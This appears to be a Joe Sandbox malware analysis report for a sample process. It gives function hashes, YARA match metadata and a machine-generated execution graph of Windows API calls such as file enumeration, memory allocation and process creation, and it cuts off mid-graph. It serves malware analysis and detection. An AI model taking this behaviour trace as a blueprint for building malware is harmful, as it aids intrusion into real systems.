              • Instruction ID: 0ac6abc6ae68cb0a9c391c0e1910e7bb4e1f635cd2066de0c355545ea0ae31a2
              • Opcode Fuzzy Hash: 0802501601948fbe9fdc910101d99a0d706e9272abae7dba0ab8098aface9820
              • Instruction Fuzzy Hash: BF11DB50D087CEDEDB12C7BD84087AEBFB15F23218F0882D9D9A42B2D2D2794645C7A6
              Function 03A66E6D Relevance: 10.1, Strings: 8, Instructions: 132COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 0000000B.00000002.2981578138.0000000003890000.00000040.00000001.00040000.00000000.sdmp, Offset: 03890000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_11_2_3890000_osqpHpjBCXXA.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID: .$P$e$i$m$o$r$x
              • API String ID: 0-620024284
              • Opcode ID: e86df46174dd781897815fccbad4a2e85b1aaec8b0725fdcf39d91c8dfb329ef
              • Instruction ID: cb44eafbe447ac3ebbe7f79f41f5f0319058f441c176d3ccf967942eff1053f1
              • Opcode Fuzzy Hash: e86df46174dd781897815fccbad4a2e85b1aaec8b0725fdcf39d91c8dfb329ef
              • Instruction Fuzzy Hash: DE41A8B5C00318B7DB14EFA0CD85FDE777CAF55310F00859AA50EAB240EAB597498FA1
              Function 03A74012 Relevance: 8.9, Strings: 7, Instructions: 119COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 0000000B.00000002.2981578138.0000000003890000.00000040.00000001.00040000.00000000.sdmp, Offset: 03890000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_11_2_3890000_osqpHpjBCXXA.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID: L$S$\$a$c$e$l
              • API String ID: 0-3322591375
              • Opcode ID: 41e95db4a7be2744076f6a07a63dd681ee74051bd6ffc224a013dbda048ac28c
              • Instruction ID: 87695aec50be8a804e8b98ccdcee0f697e60ad2bffaa704d556d6082351fd8fe
              • Opcode Fuzzy Hash: 41e95db4a7be2744076f6a07a63dd681ee74051bd6ffc224a013dbda048ac28c
              • Instruction Fuzzy Hash: 324130B6C04318AADF14EFA9DCC4BEEB7B8BF48310F05456AD909AB200E7755A458B94
              Function 03A6BB61 Relevance: 7.7, Strings: 6, Instructions: 171COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 0000000B.00000002.2981578138.0000000003890000.00000040.00000001.00040000.00000000.sdmp, Offset: 03890000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_11_2_3890000_osqpHpjBCXXA.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID: F$P$T$f$r$x
              • API String ID: 0-2523166886
              • Opcode ID: edf26e3e9968275072e249de2c8ba3e6306a0f21a5428a58616b7591200b67bc
              • Instruction ID: acac46a1c91374b9a64f07c8d42d27bb7a35cf41b1503fc74f96c3989e83dafc
              • Opcode Fuzzy Hash: edf26e3e9968275072e249de2c8ba3e6306a0f21a5428a58616b7591200b67bc
              • Instruction Fuzzy Hash: C5519471900304EEDB34EFA5CDC4BEEF7B8AF05310F04465EE5499A281E7B5A684CBA1
              Function 03A6B26E Relevance: 6.4, Strings: 5, Instructions: 200COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 0000000B.00000002.2981578138.0000000003890000.00000040.00000001.00040000.00000000.sdmp, Offset: 03890000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_11_2_3890000_osqpHpjBCXXA.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID: $i$l$o$u
              • API String ID: 0-2051669658
              • Opcode ID: 6558f4648b4866e4c04735c8e846373b67ad3277b6ec47656e4563e3a70686f9
              • Instruction ID: 3a20458123b5edada2cf63f0ef8ffacbc231a576da877dc3dc545065fe8fb0b0
              • Opcode Fuzzy Hash: 6558f4648b4866e4c04735c8e846373b67ad3277b6ec47656e4563e3a70686f9
              • Instruction Fuzzy Hash: A36128B6A00304AFDB24DBA5CC84FEFB7BCEB88710F14455EE559E7240E775AA418B60
              Function 03A6B272 Relevance: 6.4, Strings: 5, Instructions: 126COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 0000000B.00000002.2981578138.0000000003890000.00000040.00000001.00040000.00000000.sdmp, Offset: 03890000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_11_2_3890000_osqpHpjBCXXA.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID: $i$l$o$u
              • API String ID: 0-2051669658
              • Opcode ID: ad7d5b721cfab377131ce7a5bda7b50c1de86136e2e568d45a55074eefb510da
              • Instruction ID: c558e2682a8c5a095b1ca88c5294ae31ab7405f428a7feccb2220e82106d7c70
              • Opcode Fuzzy Hash: ad7d5b721cfab377131ce7a5bda7b50c1de86136e2e568d45a55074eefb510da
              • Instruction Fuzzy Hash: ED4108B5A00318AFDB20DFA5CC84FEEBBBDEB88700F10455EE559A7240D775AA45CB60
              Function 03A6AEFF Relevance: 5.3, Strings: 4, Instructions: 302COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 0000000B.00000002.2981578138.0000000003890000.00000040.00000001.00040000.00000000.sdmp, Offset: 03890000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_11_2_3890000_osqpHpjBCXXA.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID: $e$k$o
              • API String ID: 0-3624523832
              • Opcode ID: 22e79b6a2b1ec1c49f4cfd5d6553d5df89cebea1ed55f0b4db09508f357302d9
              • Instruction ID: 9c1122b48f19638c52f701ef8c7a0d5d3bc67edde6d674ded705ee530ba13408
              • Opcode Fuzzy Hash: 22e79b6a2b1ec1c49f4cfd5d6553d5df89cebea1ed55f0b4db09508f357302d9
              • Instruction Fuzzy Hash: 1DB11CB5A00708AFDB24DBA5CC84FEFB7FDAF88700F14855DF61997240D675AA418BA0
              Function 03A6B82A Relevance: 5.2, Strings: 4, Instructions: 239COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 0000000B.00000002.2981578138.0000000003890000.00000040.00000001.00040000.00000000.sdmp, Offset: 03890000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_11_2_3890000_osqpHpjBCXXA.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID: $e$h$o
              • API String ID: 0-3662636641
              • Opcode ID: 331b19d6338596541a3455233badb27fb991ae04d9ef4023f25f1bb5a770352a
              • Instruction ID: 0fa5ca91e377734c9787bce288596833b35b8b28dea838d96a5a3ec6bd515aed
              • Opcode Fuzzy Hash: 331b19d6338596541a3455233badb27fb991ae04d9ef4023f25f1bb5a770352a
              • Instruction Fuzzy Hash: A48152B6801219AEDB15EB90CD84FEEB37CEF59300F40859BA50ABA140EA755B45CFA1
              Function 03A6AF02 Relevance: 5.2, Strings: 4, Instructions: 180COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 0000000B.00000002.2981578138.0000000003890000.00000040.00000001.00040000.00000000.sdmp, Offset: 03890000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_11_2_3890000_osqpHpjBCXXA.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID: $e$k$o
              • API String ID: 0-3624523832
              • Opcode ID: b1bedfb7787c59eeb9b9b842714c40c277f3a1f7b43d35b26c68d714804dff8d
              • Instruction ID: 48d9d9d55449831602b56754fa1295ab994f997eb92fd591fd9e3b8ca803b5ea
              • Opcode Fuzzy Hash: b1bedfb7787c59eeb9b9b842714c40c277f3a1f7b43d35b26c68d714804dff8d
              • Instruction Fuzzy Hash: 52614CB5A00308AFDB54DFA4CC84FEFB7BDAF88700F108559E6599B240D771AA41CB60
              Function 03A6854C Relevance: 5.1, Strings: 4, Instructions: 132COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 0000000B.00000002.2981578138.0000000003890000.00000040.00000001.00040000.00000000.sdmp, Offset: 03890000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_11_2_3890000_osqpHpjBCXXA.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID: $e$k$o
              • API String ID: 0-3624523832
              • Opcode ID: 01ca271baa759b1a8dcef4148615210a482e1a5a439062a0fd6d38fe25388acf
              • Instruction ID: ead08073243afc1e68270f905ba97888bf70aebea75ed6d57bee8c538bef0fa7
              • Opcode Fuzzy Hash: 01ca271baa759b1a8dcef4148615210a482e1a5a439062a0fd6d38fe25388acf
              • Instruction Fuzzy Hash: 1541C6B6C00318ABDB14DFA4DD85EEEB7BCAF14300F04455EE909AB200E775A644CBB0
              Function 03A6ADC0 Relevance: 5.1, Strings: 4, Instructions: 121COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 0000000B.00000002.2981578138.0000000003890000.00000040.00000001.00040000.00000000.sdmp, Offset: 03890000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_11_2_3890000_osqpHpjBCXXA.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
              • API String ID: 0-2877786613
              • Opcode ID: af5f89181a0387ea85883fd49ebfd70d93337d324e365111594b18440835d76c
              • Instruction ID: 2946a96efcbc0e9b24c2211363ad22f6a6e2f701c5459bff62ee47b15f503f23
              • Opcode Fuzzy Hash: af5f89181a0387ea85883fd49ebfd70d93337d324e365111594b18440835d76c
              • Instruction Fuzzy Hash: 13416E759112187AEB21EB90CD82FFFB77DAF55720F04604AF5047A280EB785A05C7AA
              Function 03A6ADC2 Relevance: 5.1, Strings: 4, Instructions: 120COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 0000000B.00000002.2981578138.0000000003890000.00000040.00000001.00040000.00000000.sdmp, Offset: 03890000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_11_2_3890000_osqpHpjBCXXA.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
              • API String ID: 0-2877786613
              • Opcode ID: c5fbbdbb79a8cf63ab5860b693cf2c0ac774953bdbfdb4a167fc83ee9b0ce16a
              • Instruction ID: 2ef0befa8767ec1b069895c78e64f8fa31ec59b8b64efc65bdb1fc04bf7d54ea
              • Opcode Fuzzy Hash: c5fbbdbb79a8cf63ab5860b693cf2c0ac774953bdbfdb4a167fc83ee9b0ce16a
              • Instruction Fuzzy Hash: 773153759112187AE711EB90CD82FEFB77DEF55720F00504AF9047A280EB786B0187BA
              Function 03A6B832 Relevance: 5.1, Strings: 4, Instructions: 102COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 0000000B.00000002.2981578138.0000000003890000.00000040.00000001.00040000.00000000.sdmp, Offset: 03890000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_11_2_3890000_osqpHpjBCXXA.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID: $e$h$o
              • API String ID: 0-3662636641
              • Opcode ID: f96b5d1fd9eaaadb90794e06692c88131eff1967be1f33c9a9ea66342f454b35
              • Instruction ID: d7c3f637250f4f4999d7576689fc054bed797ae349488fda2f16f55435168aee
              • Opcode Fuzzy Hash: f96b5d1fd9eaaadb90794e06692c88131eff1967be1f33c9a9ea66342f454b35
              • Instruction Fuzzy Hash: 35417375C00329AEDB11EBA0CD84FDEB3B9EF49300F40859BA509BA240EB755B44CFA5
              Function 03A67052 Relevance: 5.1, Strings: 4, Instructions: 89COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 0000000B.00000002.2981578138.0000000003890000.00000040.00000001.00040000.00000000.sdmp, Offset: 03890000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_11_2_3890000_osqpHpjBCXXA.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID: 1$3$6$a
              • API String ID: 0-758113741
              • Opcode ID: 602e8d98a1431258267bf7df073729f584c7ac042b68216748718e2079307e10
              • Instruction ID: 0ae4c24e808468e96c3de125556f61523f46d9128a0a89cc49a9059f4f934233
              • Opcode Fuzzy Hash: 602e8d98a1431258267bf7df073729f584c7ac042b68216748718e2079307e10
              • Instruction Fuzzy Hash: 983146B5A10219BBEB04DF94CD41BFEB7B8EF45304F00415AE904AB340E7769B448BE5
              Function 03A684C2 Relevance: 5.0, Strings: 4, Instructions: 47COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 0000000B.00000002.2981578138.0000000003890000.00000040.00000001.00040000.00000000.sdmp, Offset: 03890000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_11_2_3890000_osqpHpjBCXXA.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID: $e$k$o
              • API String ID: 0-3624523832
              • Opcode ID: 7805f3b636fc97e65af30f258e78b0cfafbe0a828249a0b29b015f67bd7c5691
              • Instruction ID: a4bcae6421989d7da3a6dd0dcd54dc40b95f0d05209ab4e317859f311a9ccde9
              • Opcode Fuzzy Hash: 7805f3b636fc97e65af30f258e78b0cfafbe0a828249a0b29b015f67bd7c5691
              • Instruction Fuzzy Hash: FD0161B2900218ABDB14DF98DCC4ADEF7B9FF08714F04825AE9196B205E771D545CBA0

              Execution Graph

              Execution Coverage:3.2%
              Dynamic/Decrypted Code Coverage:3.4%
              Signature Coverage:1.7%
              Total number of Nodes:584
              Total number of Limit Nodes:86
              execution_graph 83887 3a2d3c 83892 3a7a00 83887->83892 83890 3a2d68 83893 3a2d4c 83892->83893 83894 3a7a1a 83892->83894 83893->83890 83898 3b9070 83893->83898 83901 3b8740 83894->83901 83897 3b9070 NtClose 83897->83893 83899 3b908a 83898->83899 83900 3b909b NtClose 83899->83900 83900->83890 83902 3b875a 83901->83902 83905 2e435c0 LdrInitializeThunk 83902->83905 83903 3a7aea 83903->83897 83905->83903 83906 3ac270 83908 3ac299 83906->83908 83907 3ac39d 83908->83907 83909 3ac343 FindFirstFileW 83908->83909 83909->83907 83913 3ac35e 83909->83913 83910 3ac384 FindNextFileW 83912 3ac396 FindClose 83910->83912 83910->83913 83912->83907 83913->83910 83914 3ac160 NtClose RtlAllocateHeap 83913->83914 83914->83913 83915 3af4b0 83916 3af514 83915->83916 83944 3a5f00 83916->83944 83918 3af64e 83919 3af647 83919->83918 83951 3a6010 83919->83951 83921 3af7f3 83922 3af6ca 83922->83921 83923 3af802 83922->83923 83955 3af290 83922->83955 83924 3b9070 NtClose 83923->83924 83926 3af80c 83924->83926 83927 3af706 83927->83923 83928 3af711 83927->83928 83964 3bb260 83928->83964 83930 3af73a 83931 3af759 83930->83931 83932 3af743 83930->83932 83967 3af180 CoInitialize 83931->83967 83933 3b9070 NtClose 83932->83933 83935 3af74d 83933->83935 83936 3af767 83970 3b8b20 83936->83970 83938 3af7e2 83939 3b9070 NtClose 83938->83939 83940 3af7ec 83939->83940 83974 3bb180 83940->83974 83942 3af785 83942->83938 83943 3b8b20 LdrInitializeThunk 83942->83943 83943->83942 83945 3a5f33 83944->83945 83946 3a5f57 83945->83946 83977 3b8bc0 83945->83977 83946->83919 83948 3a5f7a 83948->83946 83949 3b9070 NtClose 83948->83949 83950 3a5ffa 83949->83950 83950->83919 83952 3a6035 83951->83952 83982 3b89c0 83952->83982 83956 3af2ac 83955->83956 83987 3a4180 83956->83987 83958 3af2d3 83958->83927 83959 3af2ca 83959->83958 83960 3a4180 LdrLoadDll 83959->83960 83961 3af39e 83960->83961 83962 3a4180 LdrLoadDll 83961->83962 83963 3af3fb 83961->83963 83962->83963 83963->83927 83991 3b93b0 83964->83991 83966 3bb27b 83966->83930 83969 3af1e5 83967->83969 83968 3af27b CoUninitialize 83968->83936 83969->83968 83971 3b8b3a 83970->83971 83994 2e42ba0 LdrInitializeThunk 83971->83994 83972 3b8b6a 83972->83942 83995 3b9400 83974->83995 83976 3bb199 83976->83921 83978 3b8bdd 83977->83978 83981 2e42ca0 LdrInitializeThunk 83978->83981 83979 3b8c09 83979->83948 83981->83979 83983 3b89da 83982->83983 83986 2e42c60 LdrInitializeThunk 83983->83986 83984 3a60a9 83984->83922 83986->83984 83988 3a41a4 83987->83988 83989 3a41ab 83988->83989 83990 3a41f2 LdrLoadDll 83988->83990 83989->83959 83990->83989 83992 3b93ca 83991->83992 83993 3b93db RtlAllocateHeap 83992->83993 83993->83966 83994->83972 83996 3b941d 83995->83996 83997 3b942e RtlFreeHeap 83996->83997 83997->83976 83998 3afdb0 83999 3afdd3 83998->83999 84000 3a4180 LdrLoadDll 83999->84000 84001 3afdf7 84000->84001 84002 3a6db0 84003 3a6dcc 84002->84003 84007 3a6e1f 84002->84007 84006 3b9070 NtClose 84003->84006 84003->84007 84004 3a6f57 84005 3a6f7f 84004->84005 84029 3b5180 84004->84029 84009 3a6de7 84006->84009 84007->84004 84014 3a6190 84007->84014 84012 3a6190 3 API calls 84009->84012 84011 3a6f31 84011->84004 84034 3a6360 84011->84034 84012->84007 84015 3a61bc 84014->84015 84016 3a6010 LdrInitializeThunk 84015->84016 84017 3a6206 84016->84017 84018 3a62a8 84017->84018 84019 3b8b20 LdrInitializeThunk 84017->84019 84018->84011 84022 3a622d 84019->84022 84020 3a629f 84021 3b9070 NtClose 84020->84021 84021->84018 84022->84020 84023 3a62b4 84022->84023 84024 3b8b20 LdrInitializeThunk 84022->84024 84025 3b9070 NtClose 84023->84025 84024->84022 84026 3a62bd 84025->84026 84027 3a6010 LdrInitializeThunk 84026->84027 84028 3a62da 84026->84028 84027->84028 84028->84011 84030 3b51e5 84029->84030 84031 3b521c 84030->84031 84060 3b14a0 84030->84060 84031->84005 84033 3b51fe 84033->84005 84035 3a6385 84034->84035 84036 3a5f00 2 API calls 84035->84036 84038 3a63b5 84035->84038 84036->84038 84037 3a6651 84037->84004 84038->84037 84039 3a6010 LdrInitializeThunk 84038->84039 84047 3a65b8 84038->84047 84041 3a64e1 84039->84041 84040 3a6010 LdrInitializeThunk 84042 3a6606 84040->84042 84043 3a64ec 84041->84043 84041->84047 84072 3a60c0 84042->84072 84045 3b9070 NtClose 84043->84045 84049 3a64f6 84045->84049 84046 3b9070 NtClose 84046->84037 84047->84040 84048 3a6616 84048->84046 84050 3a6010 LdrInitializeThunk 84049->84050 84051 3a6541 84050->84051 84052 3b9070 NtClose 84051->84052 84053 3a654b 84052->84053 84054 3a6010 LdrInitializeThunk 84053->84054 84055 3a6596 84054->84055 84056 3a60c0 LdrInitializeThunk 84055->84056 84057 3a65a6 84056->84057 84058 3b9070 NtClose 84057->84058 84059 3a65b0 84058->84059 84059->84004 84061 3b14aa 84060->84061 84062 3b142c 84060->84062 84063 3b1458 84062->84063 84064 3b1444 84062->84064 84065 3b9070 NtClose 84063->84065 84066 3b9070 NtClose 84064->84066 84067 3b1461 84065->84067 84068 3b144d 84066->84068 84071 3bb2a0 RtlAllocateHeap 84067->84071 84068->84033 84070 3b146c 84070->84033 84071->84070 84074 3a60e6 84072->84074 84076 3b8a20 84074->84076 84077 3b8a3a 84076->84077 84080 2e43090 LdrInitializeThunk 84077->84080 84078 3a6174 84078->84048 84080->84078 84081 3a57f0 84086 3a7d80 84081->84086 84083 3a5820 84085 3a584c 84083->84085 84090 3a7d00 84083->84090 84087 3a7d93 84086->84087 84097 3b85a0 84087->84097 84089 3a7dbe 84089->84083 84091 3a7d44 84090->84091 84096 3a7d65 84091->84096 84103 3b8370 84091->84103 84093 3a7d55 84094 3a7d71 84093->84094 84095 3b9070 NtClose 84093->84095 84094->84083 84095->84096 84096->84083 84098 3b861e 84097->84098 84100 3b85cb 84097->84100 84102 2e42dd0 LdrInitializeThunk 84098->84102 84099 3b8643 84099->84089 84100->84089 84102->84099 84104 3b83ed 84103->84104 84106 3b839b 84103->84106 84108 2e44650 LdrInitializeThunk 84104->84108 84105 3b8412 84105->84093 84106->84093 84108->84105 84109 3a09f0 84110 3a0a0a 84109->84110 84111 3a4180 LdrLoadDll 84110->84111 84112 3a0a28 84111->84112 84113 3a0a6d 84112->84113 84114 3a0a5c PostThreadMessageW 84112->84114 84114->84113 84115 3bae70 84116 3bae7b 84115->84116 84117 3bae9a 84116->84117 84119 3b57d0 84116->84119 84120 3b5831 84119->84120 84121 3b583e 84120->84121 84123 3a1f40 84120->84123 84121->84117 84124 3a1f52 84123->84124 84131 3a1f16 84123->84131 84127 3a1eff 84124->84127 84128 3a1f0f 84124->84128 84126 3a1f2b 84126->84121 84133 3b86a0 84127->84133 84130 3a1f70 84128->84130 84128->84131 84132 3b86a0 LdrInitializeThunk 84128->84132 84130->84121 84137 3b9110 84131->84137 84132->84131 84134 3b86ba 84133->84134 84142 2e42c0a 84134->84142 84135 3b86e6 84135->84131 84138 3b91a2 84137->84138 84140 3b913e 84137->84140 84145 2e42e80 LdrInitializeThunk 84138->84145 84139 3b91d3 84139->84126 84140->84126 84143 2e42c11 84142->84143 84144 2e42c1f LdrInitializeThunk 84142->84144 84143->84135 84144->84135 84145->84139 84156 3a2db4 84157 3a2d46 84156->84157 84158 3a2d68 84157->84158 84159 3b9070 NtClose 84157->84159 84159->84158 84161 3a98a3 84163 3a98af 84161->84163 84162 3a98b6 84163->84162 84164 3bb180 RtlFreeHeap 84163->84164 84164->84162 84165 399aa0 84166 399aaf 84165->84166 84167 399af0 84166->84167 84168 399add CreateThread 84166->84168 84169 39b160 84172 3bb0f0 84169->84172 84171 39c7d1 84175 3b91e0 84172->84175 84174 3bb121 84174->84171 84176 3b920e 84175->84176 84177 3b9278 84175->84177 84176->84174 84178 3b928e NtAllocateVirtualMemory 84177->84178 84178->84174 84179 3a2360 84180 3a2385 84179->84180 84181 3a4180 LdrLoadDll 84180->84181 84182 3a23bb 84181->84182 84183 3a5f00 2 API calls 84182->84183 84184 3a23e3 84182->84184 84183->84184 84190 3bc3a0 84191 3bb180 RtlFreeHeap 84190->84191 84192 3bc3b5 84191->84192 84193 3a84a7 84194 3a84aa 84193->84194 84195 3b5180 2 API calls 84194->84195 84196 3a84b4 84195->84196 84197 3a8461 84196->84197 84199 3a6bf0 NtClose RtlAllocateHeap LdrInitializeThunk LdrInitializeThunk 84196->84199 84199->84197 84200 3b1719 84201 3b171f 84200->84201 84202 3b9070 NtClose 84201->84202 84203 3b1724 84201->84203 84204 3b1749 84202->84204 84205 3a6f90 84206 3a7002 84205->84206 84207 3a6fa8 84205->84207 84207->84206 84211 3aac50 84207->84211 84209 3a6fec 84209->84206 84217 3aaf00 84209->84217 84212 3aac75 84211->84212 84213 3b5180 2 API calls 84212->84213 84215 3aadf3 84213->84215 84214 3aaeb9 84214->84209 84215->84214 84216 3b5180 2 API calls 84215->84216 84216->84214 84218 3aaf26 84217->84218 84219 3ab159 84218->84219 84244 3b9490 84218->84244 84219->84206 84221 3aaf9c 84221->84219 84247 3bc470 84221->84247 84223 3aafbb 84223->84219 84224 3ab092 84223->84224 84225 3b86a0 LdrInitializeThunk 84223->84225 84227 3a5770 LdrInitializeThunk 84224->84227 84228 3ab0b1 84224->84228 84226 3ab01d 84225->84226 84226->84224 84231 3ab026 84226->84231 84227->84228 84243 3ab141 84228->84243 84256 3b8210 84228->84256 84229 3ab07a 84232 3a7d80 LdrInitializeThunk 84229->84232 84230 3ab058 84271 3b4460 LdrInitializeThunk 84230->84271 84231->84219 84231->84229 84231->84230 84253 3a5770 84231->84253 84236 3ab088 84232->84236 84233 3a7d80 LdrInitializeThunk 84238 3ab14f 84233->84238 84236->84206 84238->84206 84239 3ab118 84261 3b82c0 84239->84261 84241 3ab132 84266 3b8420 84241->84266 84243->84233 84245 3b94aa 84244->84245 84246 3b94bb CreateProcessInternalW 84245->84246 84246->84221 84248 3bc3e0 84247->84248 84249 3bb260 RtlAllocateHeap 84248->84249 84250 3bc43d 84248->84250 84251 3bc41a 84249->84251 84250->84223 84252 3bb180 RtlFreeHeap 84251->84252 84252->84250 84272 3b8870 84253->84272 84255 3a57ae 84255->84230 84257 3b8290 84256->84257 84259 3b823e 84256->84259 84278 2e439b0 LdrInitializeThunk 84257->84278 84258 3b82b5 84258->84239 84259->84239 84262 3b8340 84261->84262 84264 3b82ee 84261->84264 84279 2e44340 LdrInitializeThunk 84262->84279 84263 3b8365 84263->84241 84264->84241 84267 3b844e 84266->84267 84268 3b84a0 84266->84268 84267->84243 84280 2e42fb0 LdrInitializeThunk 84268->84280 84269 3b84c5 84269->84243 84271->84229 84273 3b8921 84272->84273 84275 3b889f 84272->84275 84277 2e42d10 LdrInitializeThunk 84273->84277 84274 3b8966 84274->84255 84275->84255 84277->84274 84278->84258 84279->84263 84280->84269 84281 3aa9d0 84286 3aa6e0 84281->84286 84283 3aa9dd 84301 3aa360 84283->84301 84285 3aa9f9 84287 3aa705 84286->84287 84313 3a7ff0 84287->84313 84290 3aa850 84290->84283 84292 3aa867 84292->84283 84293 3aa85e 84293->84292 84296 3aa955 84293->84296 84332 3b2ec0 84293->84332 84336 3a9db0 84293->84336 84298 3aa9ba 84296->84298 84347 3aa120 84296->84347 84299 3bb180 RtlFreeHeap 84298->84299 84300 3aa9c1 84299->84300 84300->84283 84302 3aa376 84301->84302 84310 3aa381 84301->84310 84303 3bb260 RtlAllocateHeap 84302->84303 84303->84310 84304 3aa3a2 84304->84285 84305 3a7ff0 GetFileAttributesW 84305->84310 84306 3aa6b2 84307 3aa6cb 84306->84307 84308 3bb180 RtlFreeHeap 84306->84308 84307->84285 84308->84307 84309 3b2ec0 2 API calls 84309->84310 84310->84304 84310->84305 84310->84306 84310->84309 84311 3a9db0 3 API calls 84310->84311 84312 3aa120 3 API calls 84310->84312 84311->84310 84312->84310 84314 3a8011 84313->84314 84315 3a8018 GetFileAttributesW 84314->84315 84316 3a8023 84314->84316 84315->84316 84316->84290 84317 3b3030 84316->84317 84318 3b303e 84317->84318 84319 3b3045 84317->84319 84318->84293 84320 3a4180 LdrLoadDll 84319->84320 84321 3b307a 84320->84321 84322 3b3089 84321->84322 84353 3b2af0 LdrLoadDll 84321->84353 84324 3bb260 RtlAllocateHeap 84322->84324 84328 3b3237 84322->84328 84325 3b30a2 84324->84325 84326 3b322d 84325->84326 84325->84328 84329 3b30be 84325->84329 84327 3bb180 RtlFreeHeap 84326->84327 84326->84328 84327->84328 84328->84293 84329->84328 84330 3bb180 RtlFreeHeap 84329->84330 84331 3b3221 84330->84331 84331->84293 84333 3b2ed6 84332->84333 84335 3b2fe1 84332->84335 84334 3b5180 2 API calls 84333->84334 84333->84335 84334->84333 84335->84293 84337 3a9dd6 84336->84337 84338 3b5180 2 API calls 84337->84338 84339 3a9e3d 84338->84339 84354 3ad7e0 84339->84354 84341 3a9e48 84343 3a9e66 84341->84343 84344 3a9fcf 84341->84344 84342 3a9fb4 84342->84293 84343->84342 84364 3a9c70 84343->84364 84344->84342 84345 3a9c70 RtlFreeHeap 84344->84345 84345->84344 84348 3aa146 84347->84348 84349 3b5180 2 API calls 84348->84349 84350 3aa1c2 84349->84350 84351 3ad7e0 3 API calls 84350->84351 84352 3aa1cd 84351->84352 84352->84296 84353->84322 84355 3b5180 2 API calls 84354->84355 84356 3ad804 84355->84356 84357 3ad811 84356->84357 84358 3b5180 2 API calls 84356->84358 84357->84341 84359 3ad828 84358->84359 84359->84357 84360 3b5180 2 API calls 84359->84360 84361 3ad847 84360->84361 84362 3bb180 RtlFreeHeap 84361->84362 84363 3ad854 84362->84363 84363->84341 84365 3a9c8d 84364->84365 84368 3ad870 84365->84368 84367 3a9d93 84367->84343 84369 3ad894 84368->84369 84370 3ad93e 84369->84370 84371 3bb180 RtlFreeHeap 84369->84371 84370->84367 84371->84370 84372 3a69d0 84373 3a69fa 84372->84373 84376 3a7bb0 84373->84376 84375 3a6a24 84377 3a7bcd 84376->84377 84383 3b8790 84377->84383 84379 3a7c1d 84380 3a7c24 84379->84380 84381 3b8870 LdrInitializeThunk 84379->84381 84380->84375 84382 3a7c4d 84381->84382 84382->84375 84384 3b882e 84383->84384 84385 3b87be 84383->84385 84388 2e42f30 LdrInitializeThunk 84384->84388 84385->84379 84386 3b8867 84386->84379 84388->84386 84389 3a7051 84390 3a7058 84389->84390 84391 3a6ff1 84389->84391 84392 3aaf00 9 API calls 84391->84392 84393 3a7002 84391->84393 84392->84393 84394 3b8650 84395 3b866d 84394->84395 84398 2e42df0 LdrInitializeThunk 84395->84398 84396 3b8695 84398->84396 84399 3b84d0 84400 3b8562 84399->84400 84402 3b84fe 84399->84402 84404 2e42ee0 LdrInitializeThunk 84400->84404 84401 3b8593 84404->84401 84405 3b5d50 84406 3b5daa 84405->84406 84408 3b5db7 84406->84408 84409 3b3760 84406->84409 84410 3bb0f0 NtAllocateVirtualMemory 84409->84410 84412 3b37a1 84410->84412 84411 3b38ae 84411->84408 84412->84411 84413 3a4180 LdrLoadDll 84412->84413 84415 3b37e7 84413->84415 84414 3b3830 Sleep 84414->84415 84415->84411 84415->84414 84416 3b8d50 84417 3b8e0a 84416->84417 84419 3b8d82 84416->84419 84418 3b8e20 NtCreateFile 84417->84418 84420 3b1790 84421 3b17a9 84420->84421 84422 3b5180 2 API calls 84421->84422 84426 3b17c6 84422->84426 84423 3b183c 84424 3b17f4 84425 3bb180 RtlFreeHeap 84424->84425 84427 3b1804 84425->84427 84426->84423 84426->84424 84428 3b1837 84426->84428 84429 3bb180 RtlFreeHeap 84428->84429 84429->84423 84430 2e42ad0 LdrInitializeThunk 84431 399b00 84433 399e84 84431->84433 84434 39a2d2 84433->84434 84435 3bade0 84433->84435 84436 3bae06 84435->84436 84441 3940e0 84436->84441 84438 3bae12 84439 3bae4b 84438->84439 84444 3b52e0 84438->84444 84439->84434 84448 3a2e40 84441->84448 84443 3940ed 84443->84438 84445 3b5342 84444->84445 84447 